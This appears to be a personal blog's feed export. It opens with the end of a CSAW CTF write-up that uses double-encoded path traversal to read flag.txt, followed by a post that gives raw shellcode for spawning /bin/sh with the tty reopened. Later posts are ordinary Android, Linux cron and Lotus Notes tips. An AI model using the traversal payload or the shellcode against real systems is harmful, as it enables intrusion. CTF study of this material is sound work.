<pre style="white-space: pre-wrap; word-wrap: break-word;"><span style="font-family: inherit;">
3. Next, we know that if we put so many `../` or `%25e%25e/`, we possibly able to traverse to the root of file system, eventually. So, let's try it with:
<a href="http://web.chal.csaw.io:7311/?path=%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/">http://web.chal.csaw.io:7311/?path=%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/</a>
Oh! We can see some interesting files here:
```
Directory listing for /poems/../../../../../../../
.dockerignore
back.py
flag.txt
poems/
serve.sh
server.js
```
4. The `flag.txt` is the file we need. Let's read it:</span></pre>
<pre style="white-space: pre-wrap; word-wrap: break-word;"><span style="font-family: inherit;"><a href="http://web.chal.csaw.io:7311/?path=%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/flag.txt">http://web.chal.csaw.io:7311/?path=%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/flag.txt</a>
=> Flag: `<b>flag{thank_you_based_orange_for_this_ctf_challenge}</b>`
(Ref: WAH, chapter 10, page 375)</span></pre>
<pre style="white-space: pre-wrap; word-wrap: break-word;"><span style="font-family: inherit;">
</span></pre>
<pre style="white-space: pre-wrap; word-wrap: break-word;"><span style="font-family: inherit;">### Written by: </span></pre>
<pre style="white-space: pre-wrap; word-wrap: break-word;"><span style="font-family: inherit;">@samduy - NOPS team.</span></pre>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5987800.post-17966009604924706922017-03-12T16:09:00.003+01:002017-03-12T17:59:19.080+01:00Shellcode that bring back tty input<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlymKIi0eifAJIMNCecHqJkKTQ9BjOWzSHlIFyYNLTbg1Uzg4dKBZE9AfdF-p1QEkImcQRa5HxkB0s6-Hx7MwJwEU1DYlJ6QrbK0ROXmRW_0cez5wZQBjNIPXPjHKp-auo-c9O/s1600/4661409838_919824b9fa_b.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlymKIi0eifAJIMNCecHqJkKTQ9BjOWzSHlIFyYNLTbg1Uzg4dKBZE9AfdF-p1QEkImcQRa5HxkB0s6-Hx7MwJwEU1DYlJ6QrbK0ROXmRW_0cez5wZQBjNIPXPjHKp-auo-c9O/s320/4661409838_919824b9fa_b.jpg" width="320" /></a></div>
<br />
There are cases that you think you have been able to exploit the bug (e.g. buffer-overflow) but the program is terminated right away. You have nothing to do with your shell-code. </div>
<div style="text-align: justify;">
One of the reasons is your shell-code does not bring back the input terminal so you can not type your commands.</div>
<div style="text-align: justify;">
The solution is to try with another shell-code, like the one below. It will "closes stdin descriptor and re-opens /dev/tty, then does an execve() of /bin/sh/".</div>
<blockquote class="tr_bq">
"\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"</blockquote>
<a href="https://www.exploit-db.com/exploits/13357/" target="_blank">Origin</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5987800.post-62850276314779390002011-02-25T14:26:00.004+01:002011-02-25T14:47:56.379+01:00Gingerbread (Android 2.3.3) for Nexus One - GRI40<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggwbGSfSDVKR6d1_LgL5wRipQM3NhEVYSYL09YEiiFUBbfZs9cr17z4gLpDAJvCVhDggwojmPyLVD5zc33zTDqze7Yo1aJHs9aAdYpSfs5Fq4QvSbGwQ620LBQl34y5zybkKZO/s1600/DSC_2608.JPG"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 214px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggwbGSfSDVKR6d1_LgL5wRipQM3NhEVYSYL09YEiiFUBbfZs9cr17z4gLpDAJvCVhDggwojmPyLVD5zc33zTDqze7Yo1aJHs9aAdYpSfs5Fq4QvSbGwQ620LBQl34y5zybkKZO/s320/DSC_2608.JPG" border="0" alt="" id="BLOGGER_PHOTO_ID_5577621066436320674" /></a><br />I just could not wait until my phone get the OTA update from Google. :p<div><br /></div><div>So, I decided update it manually.<br /><div><br /></div><div>And, <a href="http://goo.gl/BZDcb">here</a> is the link for the one who wants to taste the latest gingerbread (Android 2.3.3 - GRI40).</div><div>(for the Nexus One that using Froyo-FRG83G only).</div><div><br /></div><div>If you got the failed message while updating, maybe you could update the Hboot first.(the required version of Hboot is 0.35.0017 )</div></div><div><span><span><br />Here: <a href="http://goo.gl/6hEAC">Hboot 0.35.0017</a><br /></span></span><div><br /></div></div><div>Enjoy!</div><div><br /></div><div>(Ref: <a href="http://forum.xda-developers.com/showthread.php?t=965478">XDA-developer</a> )</div><div><br /></div>Unknownnoreply@blogger.com3tag:blogger.com,1999:blog-5987800.post-20449110732305635332010-06-20T16:06:00.003+02:002010-06-20T16:12:49.549+02:00Latest of Android 2.2 Froyo - FRF72<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjw0Mk5t0AlvNXoScwPWFOuCdcCK6CpaWjSZKzuCQRRtRYDqQ15vTziABDtJ8Nvc9UYraXCPgO70e6pJO6OpsBXR_8ORzEIs3KJl-5YYJzn28X0Wpm0fi4Ll7RMaBm0zw1xjM6S/s1600/DSC_0980.JPG"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 214px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjw0Mk5t0AlvNXoScwPWFOuCdcCK6CpaWjSZKzuCQRRtRYDqQ15vTziABDtJ8Nvc9UYraXCPgO70e6pJO6OpsBXR_8ORzEIs3KJl-5YYJzn28X0Wpm0fi4Ll7RMaBm0zw1xjM6S/s320/DSC_0980.JPG" border="0" alt="" id="BLOGGER_PHOTO_ID_5484858273067490738" /></a><br />I've just updated my N1 to the latest of Android 2.2 (Froyo), build number: FRF72.<div><br /></div><div>You can find the official release package on the Google server, here: </div><div><a href="https://android.clients.google.com/packages/passion/signed-passion-FRF72-from-FRF50.bc033f9e.zip">FRF72</a></div><div><br /></div><div>(Requirement: you are running Froyo FRF50!)</div><div><br /></div><div><br /></div>Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-5987800.post-30305446285841393172010-04-08T06:25:00.004+02:002010-04-08T07:10:21.353+02:00How to change SMSC number of AndroidChanging SMSC (Short Message Service Center) is necessary when you go to another country (for biz trip or traveling) and still want to send SMS (SMS roaming).<br /><br />Basically, Android phone have NO setting or application to do this. But, I found a tip.<br /><br />Here you are: <br /><br />1. Go to Phone Dialer, and press: <span style="font-weight:bold;">*#*#4636#*#*</span><br />2. Select Phone information<br />3. Scroll down to bottom of the screen, you'll see the field for SMSC setting.<br />4. [Optional] Click Refresh to see current SMSC number.<br />5. Change the SMSC number as you want. Then, click Update.<br /><br />That's it!<br /><br />P/S: I checked on my Nexus One. Maybe, in other Android phones, it's a little bit difference. But, the code is the same: *#*#4636#*#*Unknownnoreply@blogger.com8tag:blogger.com,1999:blog-5987800.post-20002353560134013352010-01-05T04:47:00.003+01:002010-01-07T05:30:03.488+01:00Auto-shutdown for Linux machineIf you want to schedule more than just a shutdown, crontab is the tool generally used for running commands on a recurring schedule.<br /><br />You should to be root:<br /><br /><blockquote># su</blockquote>Then, type the root's password<br /><br /><blockquote>Password:</blockquote>Then, use this command:<br /><br /><blockquote># crontab -e</blockquote>Add the following line:<br /><br /><blockquote>55 18 * * /sbin/shutdown -h 19:00</blockquote><br />It will auto-shutdown computer at 19:00 (after prompt users at 18:55) everyday.<br /><br />To make it works immediately, you need to restart cron service:<br /><br /><blockquote># /etc/init.d/crond restart</blockquote><br />That's it. :)Unknownnoreply@blogger.com3tag:blogger.com,1999:blog-5987800.post-30153519670123212062009-11-03T02:31:00.010+01:002017-09-25T09:19:33.915+02:00Setting proxy for Android by GUI (official way)<div>
UPDATE: [2010-05-21] It works with Froyo (Android 2.2)</div>
<div>
<br /></div>
If you read my <a href="http://duykham.blogspot.com/2009/09/how-to-set-proxy-for-android.html">earlier post</a>, maybe you already known the way to set proxy for Android (1.6 and earlier versions).<br />
<br />
But, that is "un-official way", you need to modify something (the<span style="font-style: italic; font-weight: bold;"> settings.db</span> file) in core system of Android, and you must "restart" emulator to make it available.<br />
<br />
Now, I found a new way, such a <span style="font-weight: bold;">very simple</span> way (I don't know why I haven't found it before). You can use GUI of Android to set proxy, and it works immediately.<br />
<br />
(<span style="font-style: italic; font-weight: bold;">Note:</span> this guide line for all versions before 2.0 only. It NOT works with Eclair, and I don't know the reason >"<. [---Update: It works with Froyo---] ) 1. Firstly, go to <span style="font-style: italic;"><span style="font-weight: bold;">Settings</span></span> menu, then select <span style="font-style: italic;"><span style="font-weight: bold;">Wireless controls<br /></span></span><br />
<div style="text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLiCrjGSPiFzQES4c3euXav8Sjt8yELzmFGXQYnKg7VY7shOTzXBZhKR_C6P6DaxDwU0ZM_prrHx6Fk-esOCvUs_qEsmEgiKfvYRUGIQ4qkqICAPE5GUrzeV0EhQFD7EE20Z4I/s1600-h/step1.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5399687638409975714" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLiCrjGSPiFzQES4c3euXav8Sjt8yELzmFGXQYnKg7VY7shOTzXBZhKR_C6P6DaxDwU0ZM_prrHx6Fk-esOCvUs_qEsmEgiKfvYRUGIQ4qkqICAPE5GUrzeV0EhQFD7EE20Z4I/s320/step1.png" style="cursor: pointer; height: 320px; width: 214px;" /></a><br />
<div style="text-align: left;">
<br />
2. In the Wireless controls menu, select <span style="font-style: italic; font-weight: bold;">Mobile networks</span><span style="font-style: italic;"><span style="font-weight: bold;">, </span></span><br />
<br />
<div style="text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjo3jSkT6iCSKUauEI1Y7ixBIJW6r-Zx0muaopUW3TFzO351duVjX0qsth45Y_KUJoTOGIGvUkMLUD9JQ99g5xXO1HnD2pliQS9ti8XN0QZsM_UI3qW0614YktJrUEvNa6N-MNy/s1600-h/step2.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5399693767848420674" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjo3jSkT6iCSKUauEI1Y7ixBIJW6r-Zx0muaopUW3TFzO351duVjX0qsth45Y_KUJoTOGIGvUkMLUD9JQ99g5xXO1HnD2pliQS9ti8XN0QZsM_UI3qW0614YktJrUEvNa6N-MNy/s320/step2.png" style="cursor: pointer; height: 320px; width: 214px;" /></a><br />
<br /></div>
3. Then, select <span style="font-style: italic; font-weight: bold;">Access Point Names</span><span style="font-style: italic;"><span style="font-weight: bold;"> </span></span><br />
<br />
<div style="text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4UCq3RHL536o-L5E3IPM4aGkAsLwKLOVUNrJTsMybM7zVC2bYLce33yjzR1eE8zmO7E-ZMVEwYe5OMZWOAA177BHbUBOEwcrwPb8lov2kFBWn34GjH_QwnkJus7B-aJrt6XWS/s1600-h/step3.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5399693770241950306" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4UCq3RHL536o-L5E3IPM4aGkAsLwKLOVUNrJTsMybM7zVC2bYLce33yjzR1eE8zmO7E-ZMVEwYe5OMZWOAA177BHbUBOEwcrwPb8lov2kFBWn34GjH_QwnkJus7B-aJrt6XWS/s320/step3.png" style="cursor: pointer; height: 320px; width: 214px;" /></a></div>
<br />
4. Press <span style="font-weight: bold;">Menu</span> hard key, then select <span style="font-style: italic;"><span style="font-weight: bold;">New APN</span></span><br />
<br />
<div style="text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBz-Gf46LNlmViPmjD9Ta-srCk1NZAr5l0Z_hyphenhyphenxhBJBipg7jz9Z8hHCSdCnXXnrHNID_dYGpfb8oVWzNrRyXJFbj7CNHfXwzU7FGG3cN3gs5AzUBgGoL-VztQJGZzKT1mcfbQt/s1600-h/step4.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5399693781538658658" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBz-Gf46LNlmViPmjD9Ta-srCk1NZAr5l0Z_hyphenhyphenxhBJBipg7jz9Z8hHCSdCnXXnrHNID_dYGpfb8oVWzNrRyXJFbj7CNHfXwzU7FGG3cN3gs5AzUBgGoL-VztQJGZzKT1mcfbQt/s320/step4.png" style="cursor: pointer; height: 320px; width: 214px;" /></a></div>
<br />
5. Fill information of your proxy, ex:<br />
<br />
<div style="text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMxZG1_reYKS6AIeDcX7onfZhMFkZkDfLEOzbCBbEueVl66-20gjYaVeR2umm6I46IBRh_F9DKo_8tXFUIBoziBrChN7Di5S8LyfYUQyAG-RlWNZdUrhlqCuoBTD7RcbLmixQQ/s1600-h/step5.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5399693782947840658" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMxZG1_reYKS6AIeDcX7onfZhMFkZkDfLEOzbCBbEueVl66-20gjYaVeR2umm6I46IBRh_F9DKo_8tXFUIBoziBrChN7Di5S8LyfYUQyAG-RlWNZdUrhlqCuoBTD7RcbLmixQQ/s320/step5.png" style="cursor: pointer; height: 320px; width: 214px;" /></a></div>
<br />
Name: <span style="font-weight: bold;">YourProxyName</span><br />
APN: <span style="font-weight: bold;">internet</span>Proxy<span style="font-weight: bold;">: your.proxy.server.com</span><br />
Port: <span style="font-weight: bold;">8080</span><br />
<br />
(You can use your own proxy host and port for <span style="font-style: italic;">Proxy</span> and <span style="font-style: italic;">Port</span> fields)<br />
<br />
6. Press <span style="font-weight: bold;">Menu </span>hard key, then select <span style="font-style: italic;"><span style="font-weight: bold;">Save</span>.</span><br />
<br />
<div style="text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5ys07TFc20SmLVZs_qDDtNePUUh3sSy46GtqjRxouIV5rxiEKLa_BeetGyCBIEO-7pwdEhhL1g-COWPmBwWIt796LOW8ppdudTs0EAbK6aln725zVcVqoJUu93Y304ELupxqY/s1600-h/step6.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5399693790694623154" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5ys07TFc20SmLVZs_qDDtNePUUh3sSy46GtqjRxouIV5rxiEKLa_BeetGyCBIEO-7pwdEhhL1g-COWPmBwWIt796LOW8ppdudTs0EAbK6aln725zVcVqoJUu93Y304ELupxqY/s320/step6.png" style="cursor: pointer; height: 320px; width: 214px;" /></a></div>
<br />
7. You will be returned to <span style="font-style: italic; font-weight: bold;">Mobile network settings</span> menu, you need to select <span style="font-style: italic; font-weight: bold;">Access Point Names</span><span style="font-style: italic;"> </span>again and select your new APN to activate it.<span style="font-style: italic;"><br /></span><br />
<div style="text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfcBv3Y1aHicASrls9sC6NQX-IXxe9y3ayIVtHFB15Q3Cdj8okXQ5vOKgJBLdL46aq7zYz2mnMOhyphenhyphenok9vlw85dJbg_Vs2gqogMCPsAN_5TlkYBvvGaRo-SKzwrz2ImdaGW2gXB/s1600-h/step7.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5399694505992175938" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfcBv3Y1aHicASrls9sC6NQX-IXxe9y3ayIVtHFB15Q3Cdj8okXQ5vOKgJBLdL46aq7zYz2mnMOhyphenhyphenok9vlw85dJbg_Vs2gqogMCPsAN_5TlkYBvvGaRo-SKzwrz2ImdaGW2gXB/s320/step7.png" style="cursor: pointer; height: 320px; width: 214px;" /></a></div>
<span style="font-style: italic;"><br /></span>8.<span style="font-style: italic;"> </span>Press <span style="font-weight: bold;">Home</span> hard key to return Home screen. Go to <span style="font-style: italic; font-weight: bold;">Browser</span> application.<br />
Now, you can use your own proxy for Android browser.<span style="font-style: italic;"><br /></span><br />
<div style="text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqOlTedgFxOa_JWZ_i0puP13ZclDa1htVjCvsz3t6KUGoOaHhfcYZZIyfoRrNifJZfYk4c-Kwn9IaKqBuv37gUI0cS1LhMyXN-xlnZCJ1v4kYyqaZdjRX-XcAHOmGaMBNKsdzs/s1600-h/step8.png" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5399697632651751970" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqOlTedgFxOa_JWZ_i0puP13ZclDa1htVjCvsz3t6KUGoOaHhfcYZZIyfoRrNifJZfYk4c-Kwn9IaKqBuv37gUI0cS1LhMyXN-xlnZCJ1v4kYyqaZdjRX-XcAHOmGaMBNKsdzs/s320/step8.png" style="cursor: pointer; height: 320px; width: 214px;" /></a><br />
<br /></div>
Have fun!<span style="font-style: italic;"> ^^</span></div>
</div>
Unknownnoreply@blogger.com26tag:blogger.com,1999:blog-5987800.post-14291844310708083512009-09-15T11:12:00.002+02:002009-09-15T11:16:41.925+02:00How to get EMMA code coverage of AndroidHere are some basic steps How to get Emma code coverage of Android.<br /><br />Thanks to <a href="http://groups.google.com/groups/profile?enc_user=kZO2uhcAAADDyH_Y3HYbrs2KIxNvvzDmyyV5Qr66rE75B25j4QcA7Q" target="_blank">Brett Chabot</a> and <a href="http://groups.google.com/groups/profile?enc_user=3ODDdhwAAAD4kC5nrwlA2yZLfgvZugEFU6o4CAjmAvjn6WiMe0udMQ" target="_blank">Gabor</a> for useful support at <a href="http://groups.google.com/group/android-developers/browse_frm/thread/43cf8a8ca5662f85" target="_blank">Android Developer Group</a><br /><br />Before doing these steps, you need to get full source code of Android (follow <a href="http://10.92.200.137/home/2009/05/how-to-download-android-source-code.html" target="_blank">this link</a> for more details )<br /><br />After that, go to root folder of Android source code and do extractly this instruction below.<br /><br /><strong>A. Generating code coverage using runtest script </strong><br /><br /><strong>1. </strong>Firstly, you need to add the target <em>system/framework/emma.jar</em> to the device's boot classpath. So that, modify the BOOTCLASSPATH variable in <em>/system/core/rootdir/init.rc</em> .<br /><br />a. Open <em>/system/core/rootdir/init.rc</em><br /><br />b. The <em>system/framework/emma.jar<strong> </strong></em>entry needs to be added in the exact position shown below:<br /><blockquote>export BOOTCLASSPATH=/system/framework/core.jar:/system/framework/ext.jar:<strong>/system/framework/emma.jar:</strong>/system/framework/framework.jar:/system/framework/android.policy.jar:/system/framework/services.jar</blockquote><br />c. Save and close <em>init.rc</em> file<br /><br /><strong>2. </strong>Since EMMA will save the coverage result into SDCard, you need to ensure that the SDCard can be mounted properly. So that,<br /><br />a. Open this file: <em>build/core/main.mk</em><br /><br />b. Ensure that these lines have already added (around line number 212 to 219), if not, do it by yourself!<br /><blockquote># Install a vold.conf file is one's not already being installed.<br />ifeq (,$(filter %:system/etc/vold.conf, $(PRODUCT_COPY_FILES)))<br />PRODUCT_COPY_FILES += \<br />development/data/etc/vold.conf:system/etc/vold.conf<br />ifeq ($(filter eng tests,$(TARGET_BUILD_VARIANT)),)<br />$(warning implicitly installing vold.conf)<br />endif<br />endif</blockquote><br />(Please follow <a href="https://review.source.android.com/#change,9452" target="_blank">this link</a> for more details )<br /><br /><strong>3.</strong> Build the bootimage to pick up the init.rc changes<br /><blockquote>make bootimage</blockquote><br /><strong>4.</strong> Build a full system image<br /><blockquote>make -j4</blockquote><br /><strong>5. </strong>Make EMMA<br /><blockquote>export EMMA_INSTRUMENT=true<br /><br />make emma</blockquote><br /><strong>6. </strong>Start emulator<br /><blockquote>[path_to_SDK_tools]/emulator -sdcard [path_to_your_sdcard]</blockquote><br /><strong>7. </strong>Next, use the <em>runtest.py</em> script. Runtest will do all the necessary steps to instrument your test and target package, run the test, and generate the code coverage report.<br /><blockquote>cd [path_to_android_source_code]<br /><br />python development/testrunner/runtest.py --coverage [Test_package]</blockquote><br />[Test_package] can be: <em>apidemos, core, music, email...</em> (Leave this option null to see the list).<br /><br /><strong>8.</strong> After finish this script, the coverage report will be generated and saved into <em></em><br /><br /><em>[path_to_Android_source_code]/out/emma/</em><br /><br />folder. You can find a html report of EMMA code coverage for [Test_package] there.<br /><br />=========================================================<br /><br /><strong>B. Generating code coverage for your own test </strong><br /><br />If you want to running code coverage for your own test, please follow steps as described above, but skip step 6 to 8, continue with step 9 (after step 5) shown below:<br /><br /><strong>9. </strong>Setting the environment and additional bash commands. (like <em>m,mm,mmm, choosecombo</em> etc) Notice the space after the dot!<br /><blockquote>. build/envsetup.sh</blockquote><br /><strong>10.</strong> Set the ANDROID_PRODUCT_OUT directory for the emulator to know the image location<br /><blockquote>export ANDROID_PRODUCT_OUT=[path_to_Android_source_code]/out/target/product/generic</blockquote><br />This step is important. The emulator will know where are the images it need to be synchronized with.<br /><br /><strong>11. </strong>Set EMMA_INSTRUMENTATION to true<br /><blockquote>export EMMA_INSTRUMENT=true</blockquote><br /><strong>12. </strong>Compile the Application would like to instrument<br /><blockquote>mmm development/samples/[your_project]</blockquote><br />(You can use <em>apidemos</em> for example)<br /><br />After run this step, new images can be generated and saved into ANDROID_PRODUCT_OUT (in step 10)<br /><br /><strong>13.</strong> Run emulator<br /><blockquote>[path_to_SDK_tools]/emulator -sdcard [path_to_your_sdcard]</blockquote><br /><strong>14. </strong>Remount the drive - it is needed to have a writable drive. without that sync wont work<br /><blockquote>adb remount</blockquote><br /><strong>15. </strong>Synchronize the local content (new images) with the emulator<br /><blockquote>adb sync</blockquote><br /><strong>16. </strong>Run instrumentation<br /><blockquote>adb shell am instrument -w -e coverage true [source_code_of_test]</blockquote><br />Here is example for <em>apidemos</em><br /><blockquote>adb shell am instrument -w -e coverage true com.example.android.apis.tests/android.test.InstrumentationTestRunner</blockquote><br />See <a href="http://developer.android.com/reference/android/test/InstrumentationTestRunner.html" target="_blank">this</a> for more details of InstrumentationTestRunner options.<br /><br /><strong>17. </strong>This command will dump a runtime coverage data file at <em>/sdcard/coverage.ec</em> on the device.<br /><br />Extract it to local host<br /><blockquote>adb pull /sdcard/coverage.ec coverage.ec</blockquote><br /><strong>18. </strong>Now generate a coverage report. You'll need to pass in the path to the coverage metadata generated at build time.<br /><blockquote>java -cp external/emma/lib/emma.jar emma report -r html -in coverage.ec -sp [path_to_your_project_source_code] -in out/target/common/obj/APPS/[your_project]_intermediates/coverage.em</blockquote><br />Here is example for <em>apidemos</em>:<br /><blockquote>java -cp external/emma/lib/emma.jar emma report -r html -in coverage.ec -sp development/samples/ApiDemos/src -in out/target/common/obj/APPS/ApiDemos_intermediates/coverage.em</blockquote><br /><strong>19. </strong>Now, you will get the HTML report of EMMA code coverage for your own project.<br /><br />Check it out!<br /><p style="text-align: center;"></p><div style="text-align: center;"><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjW6en3GHAyDFVczQ5nBRhWGbmHKTypkkP7s7ZTDlTBpSHN_7wZWFt6P3x1UFgDlfAKtNQqyqPRMyUuFmSuABzU__5cfWQdFYcUg6zOhpYwCrW8j2XvRpDnYbEXUko04tswbHBO/s1600-h/EMMA+Coverage+Report.png"><img style="cursor: pointer; width: 162px; height: 320px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjW6en3GHAyDFVczQ5nBRhWGbmHKTypkkP7s7ZTDlTBpSHN_7wZWFt6P3x1UFgDlfAKtNQqyqPRMyUuFmSuABzU__5cfWQdFYcUg6zOhpYwCrW8j2XvRpDnYbEXUko04tswbHBO/s320/EMMA+Coverage+Report.png" alt="" id="BLOGGER_PHOTO_ID_5381620045469458466" border="0" /></a></div><br /><strong>Notes:</strong> In the first time running instrumentation (step 7 or 16) the Android system may be crashed. But, don't worry, it will automatically restart. Then, you can run the instrumentation again successfully!Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-5987800.post-43422079193109645312009-09-15T04:11:00.006+02:002009-09-17T05:18:47.592+02:00How to set proxy for Android (updated for 1.5 and 1.6_r1 versions)Here is a tutorial to reconfigure settings of Android , to use proxy for Internet connections.<br />Basically, we need to modify content of <span style="font-weight: bold;">settings.db</span> file in <span style="font-weight: bold;">/data/data/com.android.providers.settings/databases/</span> of Android.<br /><br />So, we can follow these steps:<br /><br />1. Go into SDK tools folder<br /><blockquote>cd [path_to_SDK_folder]/tools </blockquote>then start emulator.<br /><br />2. Get <span style="font-style: italic;">settings.db</span> file from Android:<br /><blockquote> adb pull /data/data/com.android.providers.settings/databases/settings.db settings.db</blockquote>3. Use SQLite3 to modify it:<br /><br />a. If you are using Android SDK version 1.1 or lower,<br />then use:<br /><blockquote>sqlite3 settings.db "INSERT INTO system VALUES(99,'http_proxy','[proxy_host]:[proxy_port]');"</blockquote> b. If you are using Android SDK version 1.5 or higher<br />then use:<br /><blockquote>sqlite3 settings.db "INSERT INTO secure (name, value) VALUES('http_proxy','[proxy_host]:[proxy_port]');"</blockquote>4. Put it back into Android:<br /><blockquote>adb push settings.db /data/data/com.android.providers.settings/databases/settings.db</blockquote>5. Restart emulator. Then we can use proxy setting for Internet connections.Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-5987800.post-74803265919244417582009-09-15T04:02:00.003+02:002009-09-15T04:11:35.472+02:00Lotus Notes: This database cannot be read due to an invalid on disk structureError message: "This database cannot be read due to an invalid on disk structure".<br /><br />How to fix it?<br /><br />1. Open Workspace by clicking icon on the left side<br />2. Right click to Email Icon (Local) on Workspace --> "Remove From Workspace"<br />3. Right click to Email Icon (Server) again--> "Replication" --> "New Replica..."<br />4. Select a new file or replace the old one to replicate database from server to local<br />5. Waiting...<br />6. When replicating finished --> Have fun!Unknownnoreply@blogger.com4tag:blogger.com,1999:blog-5987800.post-18143778923802026762009-05-31T07:27:00.001+02:002009-05-31T07:27:05.998+02:00Duy KHUONG wants to share their location with you on Google Latitude<p> Duy KHUONG (duykham@gmail.com) wants to start sharing their location with you on Google Latitude. You need to sign in to Latitude with a Google Account (e.g., @gmail.com) and invite Duy KHUONG. To get started, or to learn more about Latitude, click the link below. To get Google Latitude on your phone, click or type in the link below from your mobile web browser.</p> <p><a href="http://m.google.com/latitude?dc=lati?dc=lati">http://m.google.com/latitude?dc=lati</a></p> <p>(c) 2009 Google Inc., 1600 Amphitheatre Parkway, Mountain View, CA 94043, USA. <a href="http://m.google.com/static/tos_en-US.html">Terms of Service</a> | <a href="http://www.google.com/m/privacy">Privacy Policy</a></p>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5987800.post-13231304817641152912007-03-15T07:37:00.000+01:002007-05-06T16:57:43.322+02:00Something about Flash and Flash Media Server<div style="text-align: center;"><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPqz9ZNKBE6q9pk1aey-wOoElsFRmN0UEvf2rOah3xfQJ9Tl-xGCa-cLnwKT6q9k_NxWiSdYNvgNjBI54zw_3iyxLGX5Wq6VcSoqV-cnID738kufj02Dxk866RXpOu4TaAa7tI/s320/ee97.jpg" /><br /></div><br /><div class="content-wrapper"><p><em>"Adobe Flash Communication Server MX is a complete solution for creating and deploying rich communications features in websites and Internet applications. The product includes a professional set of application creation and debugging tools that are integrated into Macromedia Flash MX, and powerful server software that allows you to create communications features that are accessible by the widely distributed Adobe Flash Player"</em> </p><p><br /></p><p><em>"Flash Player is the world's most pervasive software platform, used in over <span style="color: rgb(255, 0, 0);">98%</span></em> <em>of Internet-enabled PC's worldwide as well as a wide range of other hand held devices. Flash has become the ideal platform to serve video using FLV Audio/Video file format"</em></p><p style="text-align: right;"><span style="font-size:78%;">Source: FLVHosting.Com</span></p></div>Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-5987800.post-1161159579321502792006-10-18T10:19:00.000+02:002007-03-16T08:55:31.947+01:00Configure Your Applications with ConfigScript<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZEQw1WJNfrMlf6pIVofghodYmV_7GgQZ10laBnY3mMjj-LmIpL4VoYpC2D5VpNip08eVMK-IFRwygx_oPyv7-LMl79rfrVbxltryWEEr8CeK5XaWXI6w5ciBhTYbq5GgmXfSP/s1600-h/lrg_Configure-Your-Applications-with-ConfigScript.jpg"><img style="margin: 0pt 10px 